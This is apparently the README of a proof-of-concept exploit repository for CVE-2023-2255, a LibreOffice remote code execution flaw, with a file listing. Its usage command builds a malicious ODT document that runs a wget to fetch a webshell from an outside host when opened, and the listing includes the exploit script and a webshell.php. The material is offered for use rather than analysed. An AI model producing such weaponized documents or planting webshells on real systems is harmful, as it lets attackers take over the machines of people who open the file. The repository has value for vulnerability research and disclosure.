CVE-2023-2255 Libre Office # CVE-2023-2255
CVE-2023-2255 RCE & load of external ressources found by [@Icare1337](https://twitter.com/icare1337)
- https://nvd.nist.gov/vuln/detail/CVE-2023-2255
# Exploit
Just an example to drop a webshell in current directory.
```bash
python3 CVE-2023-2255.py --cmd 'wget https://raw.githubusercontent.com/elweth-sec/CVE-2023-2255/main/webshell.php' --output 'exploit.odt'
```
[4.0K] /data/pocs/ab617d8677244e98e335fad50d2191a9c2f81b80
├── [1.3K] CVE-2023-2255.py
├── [ 388] README.md
├── [4.0K] samples
│ └── [9.2K] test.odt
└── [ 25] webshell.php
1 directory, 4 files